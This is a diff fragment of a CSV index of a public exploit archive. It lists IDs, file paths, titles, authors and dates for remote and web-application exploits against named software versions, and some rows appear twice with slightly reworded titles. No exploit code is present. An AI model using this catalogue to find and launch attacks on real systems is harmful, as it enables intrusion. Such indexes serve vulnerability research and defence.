16714,exploits/windows_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows_x86,2100
@ -11857,7 +11857,7 @@ id,file,description,date,author,type,platform,port
16720,exploits/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
16721,exploits/windows/remote/16721.rb,"FileWrangler 5.30 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
16722,exploits/windows/remote/16722.rb,"Xlink FTP Client - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows,
16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,windows,
16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,windows,
16724,exploits/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows,
16725,exploits/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Remote Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,remote,windows,
16726,exploits/windows/remote/16726.rb,"FTPPad 1.2.0 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
@ -11868,10 +11868,10 @@ id,file,description,date,author,type,platform,port
16731,exploits/windows_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows_x86,
16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,remote,windows,
16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21
16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,
16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
16738,exploits/windows_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,remote,windows_x86,
16739,exploits/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21
16740,exploits/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,remote,windows,21
@ -12008,13 +12008,13 @@ id,file,description,date,author,type,platform,port
16876,exploits/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,remote,osx_ppc,
16878,exploits/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,remote,linux,
16880,exploits/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,remote,bsd_x86,
16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,remote,linux,
16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)",2010-07-03,Metasploit,remote,linux,
16888,exploits/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,remote,linux,
16903,exploits/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,remote,php,
16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,remote,linux,
16915,exploits/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,remote,linux,
16916,exploits/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,remote,linux,
16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,remote,freebsd,
16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit)",2010-07-03,Metasploit,remote,freebsd,
16920,exploits/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,remote,linux,
16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux,
16922,exploits/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,remote,linux,
@ -12138,7 +12138,7 @@ id,file,description,date,author,type,platform,port
17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,remote,windows,
17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,
17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,remote,windows,
17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,remote,windows,
17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",remote,hp-ux,
17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",remote,windows,
@ -12740,8 +12740,8 @@ id,file,description,date,author,type,platform,port
20248,exploits/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,remote,windows,
20249,exploits/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",remote,windows,
20253,exploits/linux/remote/20253.sh,"OpenSSH 1.2 - '.scp' File Create/Overwrite",2000-09-30,"Michal Zalewski",remote,linux,
20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",remote,multiple,
20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,remote,multiple,
20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1)",1994-02-07,"Josh D",remote,multiple,
20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2)",1994-02-07,anonymous,remote,multiple,
20500,exploits/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload (Metasploit)",2012-08-15,Metasploit,remote,php,
20266,exploits/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",remote,windows,
20298,exploits/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",remote,windows,
@ -12888,7 +12888,7 @@ id,file,description,date,author,type,platform,port
20593,exploits/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",remote,freebsd,
20594,exploits/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",remote,unix,
20595,exploits/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,remote,multiple,
20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",remote,linux,
20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - 'lists' Command Execution",1994-06-06,"Razvan Dragomirescu",remote,linux,
20599,exploits/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,remote,unix,
20600,exploits/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,remote,windows,
20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple,
@ -12914,7 +12914,7 @@ id,file,description,date,author,type,platform,port
20629,exploits/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,remote,cgi,
20630,exploits/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,remote,cgi,
20631,exploits/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,remote,cgi,
20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,remote,cgi,
20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution",2001-02-02,cuctema,remote,cgi,
20633,exploits/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Full Path Disclosure",2001-02-12,cuctema,remote,cgi,
20635,exploits/multiple/remote/20635.txt,"caucho Technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,remote,multiple,
20636,exploits/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,remote,linux,
@ -13266,7 +13266,7 @@ id,file,description,date,author,type,platform,port
21555,exploits/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",remote,windows,
21559,exploits/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",remote,multiple,
21560,exploits/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",remote,multiple,
21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",remote,irix,
21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution",2002-06-20,"Last Stage of Delirium",remote,irix,
21574,exploits/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",remote,unix,
21576,exploits/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",remote,windows,
21578,exploits/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",remote,unix,
@ -13628,7 +13628,7 @@ id,file,description,date,author,type,platform,port
22723,exploits/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal",2003-06-04,JeiAr,remote,windows,
22726,exploits/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,remote,windows,
22728,exploits/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",remote,windows,
22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,remote,hp-ux,
22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure",2003-06-05,di0aD,remote,hp-ux,
22734,exploits/windows/remote/22734.html,"Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",remote,windows,
22737,exploits/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,remote,windows,
22738,exploits/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,remote,windows,
@ -14101,7 +14101,7 @@ id,file,description,date,author,type,platform,port
24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,remote,windows,
24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows,
24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",remote,multiple,
24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
@ -14159,7 +14159,7 @@ id,file,description,date,author,type,platform,port
24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",remote,linux,
24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",remote,linux,
24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,remote,multiple,
24875,exploits/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,remote,windows,
24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,remote,windows,
@ -14466,7 +14466,7 @@ id,file,description,date,author,type,platform,port
27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Remote Command Execution (Metasploit)",2013-08-12,Metasploit,remote,hardware,
27293,exploits/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443
27294,exploits/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443
27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443
27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443
27319,exploits/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",remote,hardware,
27325,exploits/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",remote,windows,
27326,exploits/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,remote,linux,
@ -14847,7 +14847,7 @@ id,file,description,date,author,type,platform,port
30589,exploits/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,remote,windows,
30600,exploits/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,remote,windows,
30622,exploits/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",remote,windows,
30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",remote,windows,
30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow",2007-10-01,"Luigi Auriemma",remote,windows,
30630,exploits/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",remote,multiple,
30631,exploits/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - 'IE' Cross-Site Scripting",2007-09-20,Websecurity,remote,multiple,
30635,exploits/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",remote,windows,
@ -14982,7 +14982,7 @@ id,file,description,date,author,type,platform,port
31638,exploits/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",remote,windows,
31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,remote,php,
31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,remote,windows,9090
31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555
31689,exploits/windows/remote/31689.py,"HP Data Protector - 'EXEC_BAR' Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad Alharmeel",remote,windows,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
@ -15742,7 +15742,7 @@ id,file,description,date,author,type,platform,port
36507,exploits/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass",2012-01-10,"Adi Cohen",remote,windows,
36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,
36513,exploits/windows/remote/36513.txt,"IpTools 0.1.4 - Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,remote,windows,
36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Command Server Buffer Overflow",2012-01-06,demonalex,remote,windows,
36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Buffer Overflow",2012-01-06,demonalex,remote,windows,
36516,exploits/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",remote,windows,
36517,exploits/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows,
36518,exploits/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows,
@ -16616,7 +16616,7 @@ id,file,description,date,author,type,platform,port
630,exploits/php/webapps/630.pl,"UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force",2004-11-15,RusH,webapps,php,
631,exploits/php/webapps/631.txt,"vBulletin - 'LAST.php' SQL Injection",2004-11-15,anonymous,webapps,php,
635,exploits/php/webapps/635.txt,"MiniBB 1.7f - 'user' SQL Injection",2004-11-16,anonymous,webapps,php,
642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,webapps,cgi,
642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - 'search.pm' Remote Command Execution",2004-11-20,RoMaNSoFt,webapps,cgi,
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,
647,exploits/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,webapps,php,
648,exploits/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,webapps,php,
@ -16632,8 +16632,8 @@ id,file,description,date,author,type,platform,port
737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php,
740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php,
754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php,
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php,
786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php,
790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi,
@ -16783,15 +16783,15 @@ id,file,description,date,author,type,platform,port
1329,exploits/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,webapps,php,
1337,exploits/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,webapps,php,
1340,exploits/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,webapps,php,
1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution",2005-11-28,rgod,webapps,php,
1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution",2005-11-28,rgod,webapps,php,
1354,exploits/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,webapps,php,
1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php,
1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution",2005-12-06,rgod,webapps,php,
1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php,
1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php,
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution (C)",2005-12-07,unitedasia,webapps,php,
1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php,
1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php,
1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php,
1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,webapps,php,
1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php,
1370,exploits/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,webapps,php,
1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,
1379,exploits/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,webapps,php,
@ -16799,8 +16799,8 @@ id,file,description,date,author,type,platform,port
1383,exploits/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,webapps,php,
1385,exploits/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,webapps,php,
1387,exploits/php/webapps/1387.php,"Dev Web Management System 1.5 - 'cat' SQL Injection",2005-12-24,rgod,webapps,php,
1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command",2005-12-24,RusH,webapps,php,
1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution",2005-12-29,rgod,webapps,php,
1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command",2005-12-24,RusH,webapps,php,
1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Command Execution",2005-12-29,rgod,webapps,php,
1398,exploits/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,webapps,php,
1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,webapps,asp,
1400,exploits/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,webapps,php,
@ -16820,26 +16820,26 @@ id,file,description,date,author,type,platform,port
1469,exploits/php/webapps/1469.pl,"phpBB 2.0.19 - Style Changer/Demo Mod SQL Injection",2006-02-05,SkOd,webapps,php,
1471,exploits/cgi/webapps/1471.pl,"MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution",2006-02-06,Hessam-x,webapps,cgi,
1472,exploits/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,webapps,asp,
1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution",2006-02-08,rgod,webapps,php,
1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution",2006-02-08,rgod,webapps,php,
1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution",2006-02-08,rgod,webapps,php,
1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Command Execution",2006-02-08,rgod,webapps,php,
1484,exploits/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,webapps,php,
1485,exploits/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion",2006-02-09,rgod,webapps,php,
1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Commands Execution",2006-02-11,rgod,webapps,php,
